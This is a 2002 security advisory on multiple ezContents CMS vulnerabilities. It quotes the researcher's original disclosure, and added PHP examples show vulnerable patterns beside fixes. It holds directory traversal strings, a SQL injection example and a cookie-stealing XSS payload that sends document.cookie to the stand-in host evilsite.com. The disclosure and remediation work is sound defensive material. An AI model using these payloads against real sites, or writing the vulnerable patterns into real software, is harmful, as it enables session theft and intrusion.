ezContents Web Content Management System Contains Multiple Flaws That Allow Remote Users to Create or Delete Directories and Inject SQL Commands and Allow Remote Authenticated Users to View Files on the System
SecurityTracker Alert ID: 1004840
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 25 2002
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included: Yes
Version(s): 1.41 and prior versions
Description: Several vulnerabilities were reported in the ezContents content management system. A remote user can create or delete directories, upload files, and inject SQL commands to be executed by the underlying database. Remote authenticated users can also view files and directories on the system.

A remote authenticated user with privileges to upload images can reportedly read any file on the web server that is readable by the web server process. The image file upload function does not verify that the four global variables describing an upload (file, file_name, file_size and file_type) were set by an actual file upload rather than supplied as ordinary POST data, so the function can be made to treat any file the web server can read (such as /etc/passwd) as the uploaded file. The report identifies PHP's is_uploaded_file() function as the appropriate check. This issue was fixed in version 1.41.

A remote authenticated user can apparently use the "Maintain Images:Add New:Create Subdirectory" function to create directories outside of the ezContents directory by placing '../' directory traversal sequences in the directory name. A demonstration directory name is provided:

"../../../../../../../tmp/hellothere"

A remote user can create or delete directories and upload files without logging in by POSTing data directly to the createdir.php, removedir.php, or uploadfile.php scripts. These administrative scripts reportedly do not check whether the remote user is authenticated.

A remote authenticated user can invoke the 'Maintain Images' file listing function to list certain types of files in directories outside of the ezContents directory by supplying a directory name of the following form:

"../../../../../usr/bin"

The VerifyLogin() function reportedly contains a flaw: when a login attempt fails, it redirects the remote user's web browser but does not stop execution of the script. The remainder of the script therefore still runs, and only the browser's redirect hides its output. A remote user without a valid account can edit various information by POSTing data to the appropriate script, and can view information by submitting the request with a tool such as netcat that shows the full response instead of following the redirect.
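As an added illustration (this is not ezContents code, and the report does not show the affected source), the following PHP sketch of an administrative script such as createdir.php or uploadfile.php applies the fixes the report calls for across the five issues above: the login gate terminates the script on failure, the upload handler accepts only a genuine upload, and user-supplied directory names are confined to the image directory. The image directory location, the session key, the POST field names and the function names are assumptions.

```php
<?php
// Added example (not ezContents code) of an administrative script with the
// fixes the report describes: a login gate that stops execution, a real-upload
// check, and a directory-name check. $imageRoot, the session key and the POST
// field names are assumptions for illustration.

session_start();

// Report issues 3 and 5: every administrative script must call this before any
// work, and a failed check must terminate. A bare header('Location: ...') with
// no exit keeps running; browsers follow the redirect, but a raw client such as
// netcat sees the output and the POSTed changes are still applied.
function verify_login(): void
{
    if (empty($_SESSION['user_id'])) {
        header('Location: login.php', true, 303);
        exit;
    }
}

// Report issues 2 and 4: map a user-supplied directory name onto a path under
// $root, refusing anything that could leave it. Done component by component
// rather than with realpath() so it also works for directories not yet created.
function resolve_inside_root(string $root, string $relative): ?string
{
    if (strpos($relative, "\0") !== false) {
        return null;                            // NUL truncates paths in C
    }
    $relative = str_replace('\\', '/', $relative);
    if ($relative !== '' && $relative[0] === '/') {
        return null;                            // absolute path
    }
    $parts = [];
    foreach (explode('/', $relative) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            return null;                        // "../../../tmp/hellothere" stops here
        }
        $parts[] = $seg;
    }
    return $root . ($parts ? '/' . implode('/', $parts) : '');
}

// Report issue 1: the vulnerable pattern trusted $file / $file_name from
// register_globals, e.g.  copy($file, "$dir/$file_name");  which copies
// /etc/passwd into the web-visible image directory when $file arrives as an
// ordinary POST field. The fix reads $_FILES and insists on is_uploaded_file()
// and move_uploaded_file(), which accept only PHP's own upload temp files.
function handle_upload(string $root, string $subdir): bool
{
    if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $tmp = $_FILES['file']['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        return false;                           // a POSTed path is rejected here
    }
    $dir = resolve_inside_root($root, $subdir);
    if ($dir === null || !is_dir($dir)) {
        return false;
    }
    $name = basename($_FILES['file']['name']);  // drop any directory part
    return move_uploaded_file($tmp, "$dir/$name");
}

// Maintain Images: Create Subdirectory, with the same confinement check.
function create_subdir(string $root, string $subdir): bool
{
    $dir = resolve_inside_root($root, $subdir);
    return $dir !== null && (is_dir($dir) || mkdir($dir, 0750, true));
}

// Dispatch: the gate runs before any privileged work.
verify_login();
$imageRoot = __DIR__ . '/images';               // assumed image directory
$subdir    = $_POST['subdir'] ?? '';
$ok = (($_POST['action'] ?? '') === 'createdir')
    ? create_subdir($imageRoot, $subdir)
    : handle_upload($imageRoot, $subdir);
http_response_code($ok ? 200 : 400);
```

The same resolve_inside_root() guard belongs in front of the 'Maintain Images' file listing and removedir.php, since both take a directory name from the request; and verify_login() must be the first statement of each such script, not only of the menu pages that link to them.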
Several cross-site scripting flaws were reported, in the diary and elsewhere. A remote user can enter malicious JavaScript that, when viewed by another (victim) user, will be executed by the victim's browser. The code will originate from the site running ezContents and will run in the security context of that site. As a result, the code will be able to access the victim's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the victim via web form to the site, or take actions on the site as the victim. The report recommends encoding output with htmlspecialchars().

A remote user can reportedly inject SQL commands to be executed by the underlying database server. According to the report, the affected SQL statements do not quote the input variables, so no apostrophe is needed to break out of a string; whatever is supplied is placed directly into the statement.
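The two injection classes above, as an added PHP example that is not ezContents code (the report does not show the affected source): each vulnerable pattern beside its fix, using the report's own cookie-stealing payload as the constructed XSS input. The diary table, its columns and the mysqli connection are assumptions for illustration.

```php
<?php
// Added example (not ezContents code): the two injection flaws described in
// the advisory, each as the vulnerable pattern beside its fix. The diary table,
// its columns and the mysqli connection are assumptions for illustration.

// Cross-site scripting. Vulnerable: a stored diary entry is echoed as-is, so
// the cookie-stealing <script> payload runs in every reader's browser.
function render_entry_vulnerable(string $entry): string
{
    return '<p>' . $entry . '</p>';
}

// Fixed: encode for the HTML context at output time, as the report suggests.
// ENT_QUOTES also encodes ' and " so the value is safe inside quoted
// attributes; the charset argument must match the page's own encoding.
function render_entry(string $entry): string
{
    return '<p>' . htmlspecialchars($entry, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// SQL injection. Vulnerable: the value is interpolated without quotes, so the
// attacker needs no apostrophe; an id of "1 OR 1=1" returns every row and a
// UNION SELECT can pull data from another table.
function load_entry_vulnerable(mysqli $db, string $id): ?array
{
    $res = $db->query("SELECT id, entry FROM diary WHERE id = $id");
    return ($res && ($row = $res->fetch_assoc())) ? $row : null;
}

// Fixed: bind the value as a parameter; it travels separately from the SQL
// text and is never parsed as part of the statement. The 'i' type also
// coerces the value to an integer, which is what the column expects.
function load_entry(mysqli $db, string $id): ?array
{
    $stmt = $db->prepare('SELECT id, entry FROM diary WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $res = $stmt->get_result();
    $row = $res ? $res->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

// Constructed payload (the one quoted in the report), rendered through the
// fixed function; no database is needed for this part.
$payload = '<script>self.location.href="http://evilsite.com/evil?"'
         . '+escape(document.cookie)</script>';
echo render_entry($payload), PHP_EOL;
```

The point of binding rather than quoting by hand is that it also covers the unquoted-integer case the report describes: wrapping the value in apostrophes would not have been enough if the value were then used elsewhere unquoted, whereas a bound parameter is never concatenated into SQL at all.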
The vendor has reportedly been notified.
Impact: A remote user can create or delete directories, upload files, and inject SQL commands to be executed by the underlying database. A remote user can conduct cross-site scripting attacks to steal user cookies. A remote authenticated user can view files and directories on the system.
Solution: According to the report, the image upload file-reading vulnerability (issue 1 in the report) was fixed in version 1.41, available at:
http://download.visualshapers.com/ezContents_1_41.tar.gz
http://www.visualshapers.com/
No solution for the other vulnerabilities was available at the time of this entry.
Vendor URL: www.visualshapers.com/
Cause: Access control error, Authentication error, Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Ulf Harnhammar <ulfh@update.uu.se>
Message History: None.
Source Message Contents
Date: Thu, 25 Jul 2002 16:00:25 +0200 (CEST)
From: Ulf Harnhammar <ulfh@update.uu.se>
Subject: ezContents multiple vulnerabilities
ezContents multiple vulnerabilities
PROGRAM: ezContents
VENDOR: Marek Lyczba et al. <info@visualshapers.com>
HOMEPAGE: http://www.visualshapers.com/
VULNERABLE VERSIONS: 1.40, 1.41, possibly others as well
NOT VULNERABLE VERSIONS: none (one hole fixed in 1.41)
LOGIN REQUIRED: yes (some issues), no (some issues)
SEVERITY: high
DESCRIPTION:
"ezContents is a Web site content management system based on
PHP and MySQL. Features include maintaining menus and sub-menus,
adding authors that can write contents, permissions, work flow, and
simple settings to customise layout and the look of the site. It is
possible to integrate external scripts, and frames as well as frameless
Web site designs are supported."
(direct quote from the program's project page at Freshmeat)
According to the downloaded package, ezContents is released under the
terms of the GNU General Public License. According to the program's
homepage, it is released under the GNU General Public License with
some additional clauses, one which states that you have to ask
permission before using the program commercially. (Does the GPL
really allow you to add additional clauses?)
SECURITY HOLES:
1) The image file upload function allows uploads to occur, without
checking if the four global variables with information about an
upload (file, file_name, file_size and file_type) really were set
by uploading a file or if they were normal POST data. This means
that it can be fooled into treating any file that the web server
can read (like /etc/passwd) as the uploaded file.
You fix this by using PHP's is_uploaded_file() function, which
checks if a real upload has taken place.
This issue was corrected in ezContents 1.41.
2) Maintain Images:Add New:Create Subdirectory can create directories
outside of the ezContents directory, by using directory names like
"../../../../../../../tmp/hellothere".
3) The administrative scripts createdir.php, removedir.php and
uploadfile.php don't check if you're logged in or not. This means
that an attacker can create/remove directories and upload files to
the server by POSTing data to the right script with no need for a
username or a password.
4) Maintain Images' file listing can be fooled into listing
directories outside of the ezContents directory, if you use directory
names like "../../../../../usr/bin". It only lists certain types
of files, though.
5) The VerifyLogin() function redirects the web browser, if the
login fails. It doesn't stop the program's execution. This means
that the script still runs, just that you don't see it. Equipped
with this knowledge, an attacker without a username can edit lots of
different information by simply POSTing data to the right script, and
view lots of different information equipped with a tool like netcat.
6) ezContents has got some Cross-Site Scripting issues, in the
diary and other places. One user can enter some JavaScript code,
which will be executed when another user looks at that entry. This
can be used for stealing someone's cookies:
<script>self.location.href="http://evilsite.com/evil?"+
escape(document.cookie)</script>
You fix this with the htmlspecialchars() function.
7) Finally, there are some SQL Injection issues. They are of the
simple type where you don't really have to inject anything, because
the programmer didn't put apostrophes around the input variables
in the SQL statements.
COMMUNICATION WITH VENDOR:
The vendor was contacted on the 6th of June and on the 5th of July.
They are working on fixing these holes, but so far, only issue 1
above has been fixed.
// Ulf Harnhammar
ulfh@update.uu.se